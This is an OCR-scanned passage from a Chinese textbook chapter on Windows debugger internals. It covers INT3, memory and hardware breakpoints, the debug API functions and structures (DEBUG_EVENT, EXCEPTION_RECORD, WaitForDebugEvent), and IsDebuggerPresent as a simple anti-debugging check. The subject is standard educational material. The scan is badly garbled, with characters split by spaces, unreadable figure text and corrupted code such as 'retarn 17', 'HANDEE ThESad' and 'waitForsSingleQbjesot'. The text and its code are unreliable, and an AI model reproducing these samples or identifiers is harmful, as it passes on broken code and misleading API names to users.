可 以 看 出 ， 这 里 给 的 Address 是 一 个 VA 虚拟 地 址 )， 用 OD 打开 这 个 程序 ， 直接 按 F9 
键 运行 ， 如 图 6-65 和 图 6-66 所 示 。 








图 6-64 “错误 报告 内 容 ” 对 话 框 6-65 在 OD 中 运行 后 被 断 下 


从 图 6-65 中 可 以 看 到 , 程序 执行 停 在 了 00401029 位 置 处 。 从 图 6-66 看 到 , INT3 命令 位 
于 00401028 位 置 处 。 再 看 一 下 图 6-64 中 Address 后 面 的 [Eee 
值 ， 为 00401028。 这 也 就 证 明了 在 系统 的 错误 报告 中 可 以 | oes - 
给 出 正确 的 出 错 地 址 (或 产生 异常 的 地 址 )。 这样 在 以 后 写 6 
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程序 的 过 程 中 可 以 很 容易 地 定位 到 自己 程序 中 有 错误 的 位 置 。 


Ey 注 : 在 OD 中 运行 让 已 的 jht 3 程序 时 ， 可 能 .GD 不 会 停 在 00401029 地 址 处 ， 也 不 会 给 出 类 似 图 6-65 的 

上 “提示 。 在 实验 这 个 例子 的 时 候 需 要 对 OD 进行 设置 ， 在 菜单 中 选择 “选项 “调试 设置 *， 打 开 “ 调 试 选 
项 ”对 话 框 ， 选 择 “异常 ”选项 卡 ， 取 消 “INT3 中 断 ” 复 选 框 的 选中 状态 ， 这 样 就 可 以 按照 该 例子 进行 测 
试 了 。 


回 到 中 断 断 点 的 话题 上 , 中 断 断 点 是 由 int 3 产生 的 , 那么 要 如 何 通过 调试 器 (调试 进程 ) 
在 被 调试 进程 中 设置 中 断 断 点 呢 ? 看 图 6-65 中 00401028 地 址 处 ， 在 地 址 值 的 后 面 、 反 汇编 
代码 的 前 面 ， 中 间 那 一 列 的 内 容 是 汇编 指令 对 应 的 机 器 码 。 可 以 看 出 ，INT3 对 应 的 机 器 码 是 
0xCC。 如 果 想 通过 调试 器 在 被 调试 进程 中 设置 INT3 断 点 的 话 ， 那 么 只 需要 把 要 中 断 的 位 置 
的 机 器 码 改 为 0xCC 即 可 。 当 调试 器 捕获 到 该 断 点 异常 时 ， 修 改 为 原来 的 值 即 可 。 

内 存 断 点 的 方法 同样 是 通过 异常 产生 的 。 在 Win32 平台 下 ， 内 存 是 按 页 进行 划分 的 ， 每 
页 的 大 小 为 4KB。 每 一 页 内 存 都 有 其 各 自 的 内 存 属性 ， 常 见 的 内 存 属 性 有 只 读 、 可 读 写 、 可 
执行 、 可 共享 等 。 内 存 断 点 的 原理 就 是 通过 对 内 存 属性 的 修改 ， 本 该 允许 进行 的 操作 无 法 进 
行 ， 这 样 便 会 引发 异常 。 

在 OD 中 关于 内 存 断 点 有 两 种 ， 一 种 是 内 存 访问 ， 另 一 种 
是 内 存 写 入 。 用 OD 随便 打开 一 个 应 用 程序 , 在 其 “ 转 存 窗口 ” 
(或 者 叫 “ 数 据 窗口 ?) 中 随便 选中 一 些 数 据点 后 单 击 右键 ， 在 
弹出 的 菜单 中 选择 “ 断 点 ”命令 ， 在 “ 断 点 ” 子 命令 下 会 看 到 
“内 存 访问 ”和 “内 存 写 入 ”两 种 断 点 ， 如 图 6-67 所 示 。 

下 面 通过 简单 例子 来 看 如 何 产 生 一 个 内 存 访问 异常 ， 代 码 如 下 : 


#include <Windows.h> 





图 6-67 内 存 断 点 类 型 


#define MEMLEN Ox100 

int main(int argc, char* argv[]) 

: PBYTE pByte = NULL; 
pByte = (PBYTE)malloc (MEMLEN)? 
if ( pByte == NULL ) 
FEtEUEN —17 


} 


DWORD dwProtect = 07 
VirtualProtect (pByte, MEMLEN, PAGE READONLY, &dwProtect); 


BYTE bByte = '\xCC'y 
memcpy(pByte,; (const char *)&bByte, MEMLEN):; 
free (pByte); 


return 0; 


} 

这 个 程序 中 使 用 了 VirtualProtect() 函 数 , 该 函数 与 第 3 章 中 介绍 的 VirtualProtectEx() 函 数 类 
似 , 不 过 VirtualProtect() 是 用 来 修改 当前 进程 的 内 存 属 性 的 。 读 者 如 果 不 记得 , 可 以 参考 MSDN。 

对 这 个 程序 编译 连接 ， 并 运行 起 来 。 熟 悉 的 出 错 界 面 又 出 现在 眼前 ， 如 图 6-68 所 示 。 
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中 
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遇 纹 灯 遇 半 才 口 赣 
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按照 前 面 介 绍 的 步 又 打开 “错误 报告 内 容 ” 对 话 框 ， 如 图 6-69 所 示 。 


pt Vendor Code: 7SEE6547 -~ rd es 
ER » Varsion: .80020555 SPH Fi : DEEBESFE 
BO AMD Feat 


ure Code: We 










NemBreak exe 过 到 问题 需要 关闭 。 我 们 对 此 引起 的 不 便 表 示 
_ 抱 坎 。 


加 果 人 下 处 于 浊 得 当中 ， 信息 有 可 能 天 夫 。 





图 6-68 “异常 基本 信息 ”对 话 框 图 6-69 “错误 报告 内 容 ” 对 话 框 





按照 上 面 的 分 析 方 法 来 看 一 下 Code 和 Address 这 两 个 值 。Code 后 面 的 值 为 0xc0000005， 
这 个 值 在 Winnt.h 中 的 定义 如 下 : 


Hdefine STATUS, ACCESS VIOLATION ( (DWORD) OxCOO000005L) 

这 个 值 的 意义 表示 访问 违例 。Address 后 面 的 值 为 0x0000000000403093， 这 个 值 是 地 址 ， 
但 是 这 里 的 地 址 根据 程序 来 考虑 ， 值 是 用 malloc0 函 数 申 请 的 ， 用 于 保存 数据 的 堆 地 址 ， 而 
不 是 用 来 保存 代码 的 地 址 。 这 个 地 址 就 不 进行 测试 了 ， 因 为 是 动态 申请 ， 很 可 能 每 次 不 同 ， 
因此 读者 了 解 就 可 以 了 。 

硬件 断 点 是 由 硬件 进行 支持 的 ， 它 是 硬件 提供 的 调试 寄存 器 组 。 通 过 这 些 硬件 寄存 器 设 
置 相 应 的 值 ， 然 后 让 硬件 断 在 需要 下 断 点 的 地 址 。 在 CPU 上 有 一 组 特殊 的 寄存 器 ， 被 称 作 调 
试 寄存 器 。 该 调试 寄存 器 有 8 个 ， 分 别 是 DR0 一 DR7， 用 于 设置 和 管理 硬件 断 点 。 调 试 寄存 
器 DR0 一 DR3 用 于 存储 所 设置 硬件 断 点 的 内 存 地 址 , 由 于 只 有 4 个 调试 寄存 器 可 以 用 来 存放 
地 址 ， 因 此 最 多 只 能 设置 4 个 硬件 断 点 。 寄 存 器 DR4 和 DR5 是 系统 保留 的 ， 并 没有 公开 其 
用 处 。 调试 寄 存 器 DR6 被 称 为 调试 状态 寄存 器 , 记录 了 上 一 次 断 点 触发 所 产生 的 调试 事件 类 
型 信息 。 调 试 寄存 器 DR7 用 于 设置 触发 硬件 断 点 的 条 件 ， 比 如 硬件 读 断 点 、 硬 件 访问 断 点 或 
硬件 执行 断 点 。 由 于 调试 寄存 器 原理 内 容 较 多 ， 这 里 就 不 具体 进行 介绍 。 


6.6.2 调试 API 函数 及 相关 结构 体 介绍 


通过 前 面 的 内 容 已 经 知道 ， 调 试 器 的 根本 是 依靠 中 断 ， 其 核心 也 是 中 断 。 前 面 也 演示 了 
两 个 产生 中 断 异 常 的 例子 。 本 小 节 的 内 容 是 介绍 调试 API 函数 及 其 相关 的 调试 结构 体 。 调 试 
API 函数 的 数量 非常 少 ， 但 是 其 结构 体 是 非常 少 有 的 较为 复杂 的 。 虽 然 说 是 复杂 ， 其 实 只 是 
媒 套 的 层级 比较 多 ， 只 要 了 解 了 较为 常见 的 ， 剩 下 的 可 以 自己 对 照 MSDN 进行 学 习 。 在 介绍 
完 调 试 API 函数 及 其 结构 体 后 ， 再 来 简单 演示 如 何 通过 调试 API 捕获 INT3 断 点 和 内 存 断 点 。 

1. 创建 调试 关系 

既然 是 调试 ,那么 必然 存在 调试 和 被 调试 。 调 试 和 被 调试 的 这 种 调试 关系 是 如 何 建立 起 来 
的 ， 这 是 读者 首先 要 了 解 的 内 容 。 要 使 调试 和 被 调试 创建 调试 关系 ， 就 会 用 到 两 个 函数 中 的 一 














中 
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个 ， 分 别 是 CreateProcess0 和 DebugActiveProcess()。 其 中 CreateProcessO 函 数 已 经 介绍 过 了 ， 
那么 如 何 使 用 CreateProcess() 函 数 来 建立 一 个 需要 被 调试 的 进程 呢 ?” 回 顾 一 下 CreateProcess() 


函数 ， 其 定义 如 下 : 
BOOL CreateProcess'! 

LECTSTR lpApplicationName, // 可 执行 模块 的 名 称 
LPTSTR lpCommandLine, 7/ 命令 行 字符 串 
LPSECURITY ATTRIBUTES lpProcessAttributes, Vu SD 
LPSECURITY ATTRIBUTES lpThreadAttributes, A I 
BOOL bInheritHandles, /7 处 理 继承 选项 
DWORD dwCreationFlags, /1 创建 标记 
TBPVOID lpEnvironment, // 新 环 模块 
LECTSTR lpCurrentDirectory, // 当前 目录 名 称 
LPSTARTUPINEFO lpstartupIinfo, // 启动 信息 


LPPROCESS INFORMATION lpProcessinformation ZX/ 进程 信息 


) ; 

现在 要 做 的 是 创建 一 个 被 调试 进程 。CreateProcess() 函 数 有 一 个 dwCreationFlags 参数 ， 
其 取 值 中 有 两 个 重要 的 常量 ,分别 为 DEBUG PROCESS 和 DEBUG ONLY _ THIS PROCESS。 
DEBUG PROCESS 的 作用 是 被 创建 的 进程 处 于 调试 状态 。 如 果 一 同 指 定 了 DEBUG _ONLY_ 
THIS_PROCESS 的 话 ， 那 么 就 只 能 调试 被 创建 的 进程 ， 而 不 能 调试 被 调试 进程 创建 出 来 的 进 
程 。 只 要 在 使 用 CreateProcess() 函 数 时 指定 这 两 个 常量 即 可 。 

除了 CreateProcess() 函 数 以 外 ， 还 有 一 种 创建 调试 关系 的 方法 ， 该 方法 用 的 函数 如 下 : 


BOOL DebugActiveProcess'( 
DWORD dwProcessId // Erocess to be debugged 


并 

这 个 函数 的 功能 是 将 调试 进程 附加 到 被 调试 的 进程 上 。 该 函数 的 参数 只 有 一 个 ， 该 参数 
指定 了 被 调试 进程 的 进程 ID 号 。 从 函数 名 与 函数 参数 可 以 看 出 ， 这 个 函数 是 和 一 个 已 经 被 
创建 的 进程 来 建立 调试 关系 的 ， 跟 CreateProcess() 的 方法 不 一 样 。 在 OD 中 也 同样 有 这 个 功 
能 ， 打 开 OD， 选 择 菜 单 中 的 “文件 ”一 “ 挂 接 ”( 或 者 是 “附加 ”) 命令 ， 就 出 现 “ 选 择 要 
附加 的 进程 ”窗口 ， 如 图 6-70 所 示 。 


\SYystvemiocr\Syatem32\ smss.r | 
V22\C-SWINDONS\aystem32\es 


793\C: \WINDOWS\ sayaetem32 Vwi! 
C:\HINDOWS\ aystemw32\asrvicy 
C:\HINDONS\syatem32\1sess., 
D:\Program Files\TIancenr\ 
Ic:\documents znd settings\. 
IC:\WINDONS\aystem32\ svchos 
| C:\WINDONRS\system32\svchos 
Ic:\WINDONS\ syster32\svchos. 


| 





图 6-70 “选择 要 附加 的 进程 ”窗口 


OD 的 这 个 功能 是 通过 DebugActiveProcess() 函 数 来 完成 的 。 

调试 器 与 被 调试 的 目标 进程 可 以 通过 前 两 个 函数 建立 调试 关系 ， 但 是 如 何 使 调试 器 与 被 
调试 的 目标 进程 断 开 调试 关系 呢 ? 有 一 个 很 简单 的 方法 : 关闭 调试 器 进程 ， 这 样 调 试 器 进程 
与 被 调试 的 目标 进程 会 同时 结束 。 也 可 以 关闭 被 调试 的 目标 进程 , 这 样 也 可 以 断 开 调试 关系 。 
那 如 何 让 调试 器 与 被 调试 的 目标 进程 断 开 调试 关系 ， 又 保持 被 调试 目标 进程 的 运行 呢 ? 这 里 
介绍 一 个 函数 ， 函 数 名 为 DebugActiveProcessStop()， 其 定义 如 下 : 


WINBASEAPI 
BOOL 
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WINAPI 
DebugActiveProcessSstop( 
in DWORD dwProcessTtd 


) “7 

该 函数 只 有 一 个 参数 ， 就 是 被 调试 进程 的 进程 ID 号 。 使 用 该 函数 可 以 在 不 影响 调试 器 
进程 和 被 调试 进程 的 正常 运行 的 情况 下 ， 将 两 者 的 关系 解除 。 但 是 有 一 个 前 提 ， 被 调试 进程 
需要 处 于 运行 状态 ， 而 不 是 中 断 状态 。 如 果 被 调试 进程 处 于 中 断 状态 时 和 调试 进程 解除 调试 
关系 ， 由 于 被 调试 进程 无 法 运行 而 导致 退出 。 

2. 判断 进程 是 否 处 于 被 调试 状态 

很 多 程序 都 要 检测 自己 是 否 处 于 被 调试 状态 ， 比 如 游戏 、 病 毒 ， 或 者 加 这 后 的 程序 。 游 
戏 为 了 防止 被 做 出 外 挂 而 进行 反 调试 ， 病 毒 为 了 给 反 病 毒 工程 师 增 加 分 析 难 度 而 反 调试 。 加 
壳 程 序 是 专门 用 来 保护 软件 的 ， 当 然 也 会 有 反 调 试 的 功能 〈 该 功能 仅 限 于 加 密 壳 ， 压 缩 壳 一 
般 没有 反 调 试 功能 )。 

本 小 节 不 是 要 介绍 反 调试 ， 而 是 介绍 一 个 简单 的 函数 ， 这 个 函数 是 判断 自身 是 否 处 于 被 
调试 状态 ， 函 数 名 为 IsDebuggerPresent()， 其 定义 如 下 : 


BOOL IsDebuggerPresent (VOID) 7 

该 函数 没有 参数 ， 根 据 返 回 值 来 判断 是 否 处 于 被 调试 状态 。 这 个 函数 也 可 以 用 来 进行 反 
调试 。 不 过 由 于 这 个 函数 的 实现 过 于 简单 ， 很 容易 就 能 够 被 分 析 者 突破 ， 因 此 现在 也 没有 软 
件 再 使 用 该 函数 来 进行 反 调试 了 。 

下 面 通过 一 个 简单 的 例子 来 演示 IsDebuggerPresent() 函 数 的 使 用 ， 代 码 如 下 : 


#include <Windows.h> 
#include <stdio,h> 


extern Cn BOOL WINAPI IsDebuggerPresent (VOID); 
DWORD WINAPI ThreadProc (LPVOID lpParam) 
; 入 时 六 次 所 1) 
: // 检 测 用 ActiveDepugProcess() 来 创建 调试 关系 
1if '( lsDebuggerpresent() '==/ TRUE ) 
， printf ("thread func checked the aebuggee NENnn) 7 


break’ 


} 
Sleep (1000) 7 


return 0; 


int main(int argc, char* argv[]) 
BOOL bRet = FALSE; 


// 检 测 CreateProcess () 创建 调试 关系 
bRet = IsDebuggerPresent(); 


4f£ ( bRet == TRUE ) 

{ 
printfi("main func checked the debuggee \r\n"); 
getchar (); 
retarn 17 
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HANDEE ThESad = CreateThread(NULL;, 9 ThreadProc, NUIE 0; NGEDED) 5 
if ( hThread == NULL ) 
{ 

et 


} 


waitForsSingleQbjesot (nThreads LNEINITE):; 
CloseHandle (hThread); 


getchar()y 


return 0; 


} 

这 个 例子 用 来 检测 自身 是 否 处 于 被 调试 状态 。 在 进入 主 函 数 后 ， 直 接 调 用 IsDebugger 
Present() 函 数 ， 判 断 是 否 被 调试 器 创建 。 在 自 定义 线程 函数 中 ， 一 直 循环 检测 是 否 被 附加 。 
只 要 发 现 自身 处 于 被 调 斌 状态， 那么 就 在 控制 台中 进行 输出 提示 。 

现在 用 OD 对 这 个 程序 进行 测试 。 首 先 用 OD 直接 打开 这 个 程序 ， 并 按 F9 键 运行 ， 如 
图 6-71 所 示 。 

按 下 F9 键 启动 以 后 ， 控 制 台 中 输出 “main func checked the debuggee”， 也 就 是 发 现 了 调 
斌 器。 再 测试 一 下 检测 OD 附加 的 效果 。 先 运行 这 个 程序 ， 然后 用 OD 去 挂 接 它 ， 看 其 提示 ， 
如 图 6-72 所 示 。 











下 E\ 篇 程 \ 第 六 章 \source\IsDebugTest\Debug\IsDebugTestexe 


dehuggee 


二 





图 6-71 主 函 数 检测 到 调试 器 图 6-72 线程 函数 检测 到 调试 器 


控制 台中 输出 “thread func checked the debuggee”。 可 以 看 出 ， 用 OD 进行 附加 也 能 够 检 
测 到 自身 处 于 被 调试 状态 。 











= Di 注 : 进行 该 测试 时 请 选用 原版 ODD。 由 于 检测 是 否 处 于 被 调试 的 这 种 方法 过 于 简单 ， 因 此 任何 其 他 修改 版 
的 OD 都 可 以 将 其 突破 ， 从 而 使 得 测试 失败 。 


3. 断 点 异常 函数 

有 时 为 了 调试 方便 可 能 会 在 自己 的 代码 中 插入 ”asm int 3， 这 样 当 程序 运行 到 这 里 时 会 
产生 一 个 断 点 ， 就 可 以 用 调试 器 进行 调试 了 。 其 实 微软 提供 了 一 个 函数 ， 使 用 该 函数 可 以 直 
接 让 程序 运行 到 某 处 的 时 候 产 生 INT3 断 点 ， 该 函数 的 定义 如 下 : 


VOID DebugBreak (VOID); 

修改 一 下 前 面 的 程序 ， 把 _asm int 3 蔡 换 为 DebugBreak()， 编 译 连接 并 运行 。 同 样 会 因 
产生 异常 而 出 现 “ 异 常 基本 信息 ”对 话 框 ， 查 看 它 的 “错误 报告 内 容 ”， 如 图 6-73 所 示 。 

Code 后 面 的 值 为 0x80000003， 看 到 它 就 应 该 知道 是 EXCEPTION_BREAKPOINT。 
Address 后 面 的 值 为 0x000000007c92120e， 可 以 看 出 该 值 在 系统 的 DLL 文件 中 ， 因 为 调用 的 
是 系统 提供 的 函数 。 

4. 调试 事件 

调试 器 在 调试 程序 的 过 程 中 是 通过 用 户 不 断 地 下 断 点 、 单 步 等 来 完成 的 ， 而 断 点 的 产生 
在 前 面 的 内 容 中 提 到 过 一 部 分 。 通 过 前 面 介绍 的 INT3 断 点 、 内 存 断 点 和 硬件 断 点 可 以 得 知 ， 
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调试 器 是 在 捕获 目标 进程 产生 的 断 点 或 异常 从 而 做 出 响应 。 当 然 ， 对 于 所 介绍 的 断 点 来 说 是 
这 样 的 。 不 过 对 于 调试 器 来 说 ， 除 了 对 断 点 和 异常 做 出 响应 以 外 ， 还 会 对 其 他 的 一 些 事件 做 
出 响应 ， 断 点 和 异常 只 是 所 有 调试 能 进行 响应 事件 的 一 部 分 。 






ee pepe i 


age Bae: Oxd0400000 | Tsage S424: 0x00000000 


以 下 立 件 格 被 包含 在 这 个 撞 误 报告 中 - 


ee pp op it Et ey 





图 6-73 “错误 报告 内 容 ” 对 话 框 


调试 器 的 工作 方式 主要 是 依赖 在 调试 过 程 中 不 断 产 生 的 调试 事件 。 调 试 事件 在 系统 中 被 
定义 为 一 个 结构 体 ， 也 是 到 目前 为 止 要 接触 的 最 为 复杂 的 一 个 结构 体 ， 因 为 这 个 结构 体 的 几 
套 关 系 很 多 。 这 个 结构 体 的 定义 如 下 : 


typedef struct DEBUG EVENT { 
DWORD dwDebugEventCode: 
DWORD dwProcessId; 
DWORD dwThreadIid; 
union { 
EXCEPTION DEBUG INFO Exception; 
CREATE THREAD DEBUG_ INFO CreateThread; 
CREATE PROCESS DEBUG INFO CreateProcessInfo7 
EXIT THREAD DEBUG, INFO ExitThread; 
EXIT, PROCESS._DEBUG INEFO. ExitProcess’; 
LOAD, DLL DEBUG INFO LoadD]ll; 
UNLOAD, DLL _ DEBUG INFO UnloadDll1; 
OUTPUT. DEBUG_STRING INFO DebugSstring; 
RIP INFO RipInfo; 
a 
} DEBUG EVENT, *LPDEBUG EVENT; 


这 个 结构 体 非常 重要 ， 这 里 有 必要 详细 地 介绍 。 

dwDebugEventCode: 该 字段 指定 了 调试 事件 的 类 型 编码 。 在 调试 过 程 中 可 能 产生 的 调 
试 事件 非常 多 , 因此 要 根据 不 同 的 类 型 码 进行 不 同 的 响应 处 理 。 常见 的 调试 事件 如 图 6-74 
所 示 。 





线程 创建 时 而 引发 的 调试 事件 

CEEATE_PROCESS_DEBUG_EVENT 进程 创建 时 而 引发 的 凋 试 事件 

EXIT_THREAD DEBUWGE EVENT 钱 程 结束 时 而 引发 的 调试 事件 

EXIT_PROCESS_DEBUG_EVENT 进程 结束 时 而 引发 的 调试 事件 

装载 DLL 文件 时 而 引发 的 调试 事件 

DLL, DEBUG 1 郑 功 II 文件 时 而 引发 的 调试 事件 
OUTPUT_DEBVG_STRING_ EYENT | 当 进 程 调用 调试 输出 函数 时 而 引发 的 调试 事件 


图 6-74 dwDebugEventCode 的 取 值 
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dwProcessId: 该 字段 指明 了 引发 调试 事件 的 进程 ID 号 。 

dwThreadId: 该 字段 指明 了 引发 调试 事件 的 线程 ID 号 。 

u: 该 字段 是 一 个 联合 体 ， 其 取 值 由 dwDebugEventCode 指定 。 该 联合 体 包含 很 多 个 结构 体 ， 
包括 EXCEPTION _DEBUG INFO、CREATE THREAD DEBUG INFO、CREATE PRO CESS_ 
DEBUG INFO、EXIT_THREAD DEBUG INFO、EXIT_ PROCESS DEBUG INFO、LOAD 
DLL DEBUG INFO, UNLOAD DLL DEBUG _ INFO 和 OUTPUT DEBUG STRING INFO。 

在 以 上 众多 的 结构 体 中 ， 特 别 要 介绍 一 下 _ EXCEPTION DEBUG INFO， 因 为 这 个 结构 
体 包 含 关于 异常 相关 的 信息 ; 而 其 他 几 个 结构 体 的 使 用 比较 简单 ， 读 者 可 以 参考 MSDN。 


EXCEPTION_DEBUG INFO 的 定义 如 下 : 

typedet struet LEXCRPLTTON DEBUGLINEFO 
EXCEPTION, RECORD ExceptionRecord; 
DWORD dwFirstChance; 

} EXCEPTION DEBUG; INFO, *L.PEXCEPTION DEBUG INFO; 


EXCEPTION_DEBUG INFO 包含 的 EXCEPTION_RECORD 结构 体 中 保存 着 真正 的 异常 
信息 ，dwFirstChance 中 保存 着 ExceptionRecord 的 个 数 。EXCEPTION RECORD 结构 体 的 定 
义 如 下 : 


typedef struct EXCEPTION _ RECORD ‘{ 

DWORD ExceptionCode; 

DWORD ExceptionElags; 

struct EXCEPTION RECORD *ExceptionRecord; 

PVOID ExceptionAddress; 

DWORD NumberParanmeters; 

ULONG PTR ExceptionIinformation[EXCEPTION MAXIMUM PARAMETERS]; 
} EXCEPTION RECORD, *PEXCEPTION RECORD; 


ExceptionCode: 异常 码 。 该 值 在 MSDN 中 的 定义 非常 多 ,不 过 这 里 需要 使 用 的 值 只 有 3 
个 ， 分别 是 EXCEPTION ACCESS VIOLATION (访问 违例 )、EXCEPTION BREAKPOINT 
( 断 点 异常 ) 和 EXCEPTION SINGLE STEP ( 单 步 异常 )。 这 3 个 值 中 的 前 两 个 值 对 于 读者 
来 说 应 该 是 非常 熟悉 的 , 因为 在 前 面 已 经 介绍 过 了 ; 最 后 一 个 单 步 异常 想必 读者 也 非常 熟悉 。 








使 用 OD 快捷 键 的 F7 键 、F8 键 时 就 是 在 使 用 单 步 功能 ， 而 单 步 异 常 就 是 由 EXCEPTION_ 


SINGLE_STEP 来 表示 的 。 

ExceptionRecord: 指向 一 个 EXCEPTION RECORD 的 指针 ， 蜡 常 记 录 是 一 个 链表 ， 其 中 
可 能 保存 着 很 多 异常 信息 。 

ExceptionAddress: 异常 产生 的 地 址 。 

调试 事件 这 个 结构 体 DEBUG_EVENT 看 似 非 常 复 杂 ， 其 实 也 只 是 幅 套 得 比较 深 而 已 。 
只 要 读者 仔细 体会 每 个 结构 体 、 每 层 贬 套 的 含义 ， 自 然 就 觉得 它 没有 多 么 复杂 。 

调试 器 不 断 地 对 被 调试 目标 进程 进行 捕获 调试 信息 ， 有 点 类 似 于 Win32 应 用 程序 的 消息 
循环 ， 但 是 又 有 所 不 同 。 调 试 器 在 捕获 到 调试 信息 后 进行 相应 的 处 理 ， 然 后 恢复 线程 ， 使 之 
继续 运行 。 

用 来 等 待 捕获 被 调试 进程 调试 事件 的 函数 是 WaitForDebugEvent()， 其 定义 如 下 : 

BOOL WaitForDebugEvent ( 

LPDEBUG EVENT lpDebugEvent, /7 调试 事件 信息 
ho dwMilliseconds // 超时 值 


lpDebugEvent: 该 参数 用 于 接收 保存 调试 事件 ; 
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dwMilliseconds: 该 参数 用 于 指定 超时 的 时 间 ， 无 限制 等 待 使 用 INFINITE。 

调试 器 捕获 到 调试 事件 后 ， 会 对 被 调试 的 目标 进程 中 产生 调试 事件 的 线程 进行 挂 起 。 调 
试 器 对 被 调试 目标 进程 进行 相应 的 处 理 后 ， 需 要 使 用 ContinueDebugEvent() 对 先前 被 挂 起 的 
线程 进行 恢复 。ContinueDebugEvent() 函 数 的 定义 如 下 : 


BOOL ContinueDepbpugEvent( 


DWORD dwProcessId, // 继续 执行 的 进程 
DWORD dwThreadrd, // 继续 执行 的 线程 


DWORD dwContinueStatus // 继续 的 状态 
> 


dwProcessId: 该 参数 表示 被 调试 进程 的 进程 标识 符 。 

dwThreadId: 该 参数 表示 准备 恢复 挂 起 线程 的 线程 标识 符 。 

dwContinueStatus: 该 参数 指定 了 该 线程 以 何 种 方式 继续 执行 ， 其 取 值 为 DBG_EXCEPTI 
ON NOT HANDLED 和 DBG_CONTINUE。 对 于 这 两 个 值 来 说 ， 通 常情 况 下 并 没有 什么 差 
别 。 但 是 当 遇 到 调试 事件 中 的 调试 码 为 EXCEPTION_DEBUG EVENT 时 ， 这 两 个 常量 就 会 
有 不 同 的 动作 。 如 果 使 用 DBG_EXCEPTION NOT HANDLED， 调试 器 进程 将 会 忽略 该 异常 ， 
Windows 会 使 用 被 调试 进程 的 异常 处 理 函 数 对 异常 进行 处 理 ; 如 果 使 用 DBG_CONTINUE 的 
话 ， 那 么 需要 调试 器 进程 对 异常 进行 处 理 ， 然 后 继续 运行 。 

由 上 面 两 个 函数 配合 调试 事件 结构 体 ， 就 可 以 构成 一 个 完整 的 调试 循环 。 以 下 这 段 调试 
循环 的 代码 摘自 MSDN: 


DEBUG EVENT DeBugBv; 7/ 调试 事件 信息 
BWORD dwContinueStatus = DBG CONTINUE; // 异常 信息 


for(;»?) 


{ 

// 等 待 调试 事件 发 生 ， 第 二 个 参数 表示 该 函数 直到 发 生 调 试 事件 才 返 回 
WaitForDebudEvent (gDebugEv, INFINITE); 

/7 处 理 调试 事件 的 代码 


switch (DebugEv.dwDebugEbventCode) 
{ 
Case EXCEPTION DEBUG EVENT: 
// 处 理 异常 的 代码 ， 当 处 理 异常 时 ， 要 设置 状态 参数 
// dwContinueStatus， 该 值 由 
// ContinueDebugEvent 函数 使 用 


switch (DebugEv,u,.Exception.ExceptionRecord.ExceptionCode) 


case EXCEPTION. ACCESS VIOLATION: 
// 第 一 次 : 传递 到 系统 
// 最 后 一 次 :显示 错误 


case EXCEPTION BREAKPOINT: 
// 第 一 次 : 显示 当前 指令 和 注册 值 


case EXCEPTION DATATYPE MISALIGNMENT: 
// 第 一 次 : 传递 到 系统 
// 最 后 一 次 : 显示 错误 


case EXCEPTION SINGLE STEP; 
// 第 一 次 : 更 新 当前 指令 和 注册 值 


case DBG _ CONTROL C: 


// 第 一 次 : 传递 到 系统 
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// 最 后 一 次 : 显示 错误 


// 处 理 其 他 异常 
3 


case CREATE THREAD DEBUG EVENT: 
// 根据 需要 ， 用 GetThreadContext 和 SetThreadContext 函数 更 改线 程 的 注册 信息 
// 并 用 SuspendThread 和 ResumeThread 悬挂 或 重启 线程 


Case CREATE PROCESS DEBUG EVENT: 

/7 根据 需要 ,用 GetThreadContext 和 SetThreadContext 函数 更 改进 程 中 初始 线程 的 注册 信 息 ; 
// 用 ReadProcessMemory 和 WriteProcessMemory 函数 读 / 写 进程 的 虚拟 内 存 ; 

// 用 suspendThread 和 ResumeThread 函数 悬挂 或 重启 线程 


case EXIT THREAD DEBUG EVENT: 
// 显示 线程 的 退出 码 


case EXIT PROCESS DEBUG EVENT: 
// 显示 进程 的 退出 码 


case LOAD DLL DEBUG EVENT: 
// 在 新 加 载 的 DLL 中 读 取 调试 信息 
// loaded DLL. 


case UNLOAD. DELL DEBUG_EVENT: 
// 显示 DEL 已 卸载 的 消息 


case OUTPUT DEBUG STRING EVENT: 
// 显示 输出 的 调试 字符 串 


} 
// 重新 执行 报告 调试 事件 的 线程 


ContinueDebugEvent (DebugEv .dwProcessId, 
DebugEv .dwThreadId, dwContinueStatus); 


} 

以 上 就 是 一 个 完整 的 调试 循环 。 不 过 有 些 调 试 事件 对 于 读者 来 说 可 能 是 用 不 到 的 ， 那 么 
就 把 不 需要 的 调试 事件 所 对 应 的 case 语句 删除 就 可 以 了 。 

6. 内 存 的 操作 

调试 器 进程 通常 要 对 被 调试 的 目标 进程 进行 内 存 的 读 取 或 写 入 。 跨 进程 的 内 存 读 取 和 写 
入 的 函数 其 实在 前 面 的 章节 已 介绍 过 ， 就 是 ReadProcessMemory0 和 WriteProcessMemory()。 

要 对 被 调试 的 目标 进程 设置 INT3 断 点 ， 就 需要 使 用 WriteProcessMemory() 函 数 对 指定 的 
位 置 写 入 0xCC。 当 INT3 被 执行 后 ， 要 在 原来 的 位 置 上 把 原来 的 机 器 码 写 回去 ， 原 来 的 机 器 
码 需要 使 用 ReadProcessMemory() 函 数 来 进行 读 取 。 

内 存 操作 除了 以 上 两 个 函数 以 外 ， 还 有 一 个 就 是 修改 内 存 的 页 面 属性 的 函数 ， 即 
VirtualProtectEx()。 这 个 函数 在 前 面 也 介绍 过 了 。 

7. 线程 环境 相关 API 及 结构 体 

在 前 面 的 章节 中 介绍 过 , 进程 是 用 来 向 系统 申请 各 种 资源 的 , 而 真正 被 分 配 到 CPU 并 执 
行 代码 的 是 线程 。 进 程 中 的 每 个 线程 都 共享 进程 的 资源 ， 但 是 每 个 线程 都 有 不 同 的 线程 上 下 
文 或 线程 环境 。Windows 是 一 个 多 任务 的 操作 系统 ， 在 Windows 中 为 每 一 个 线程 分 配 一 个 时 
间 片 ， 当 某 个 线程 执行 完 其 所 属 的 时 间 片 后 ，Windows 会 切换 到 另外 的 线程 去 执行 。 在 进行 
线程 切换 以 前 有 一 步 保存 线程 环境 的 工作 ， 那 就 是 保证 在 切换 时 线程 的 寄存 器 值 、 栈 信息 及 
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| “描述 符 等 相关 的 所 有 信息 在 切换 回来 后 不 变 。 只 有 把 线程 的 上 下 文保 存 起 来 ， 下 次 该 线程 


CPU 再 次 调度 时 才能 正确 地 接着 上 次 的 工作 继续 进行 。 
章 在 Windows 系统 下 ， 将 线程 环境 定义 为 CONTEXT 结构 体 。 该 结构 体 需 要 在 Winnt.h 头 
i | 文件 中 找到 ， 在 MSDN 中 并 没有 给 出 定义 。CONTEXT 结构 体 的 定义 如 下 : 
| // 
2 /7 上 下 文 框架 
5 Yd 
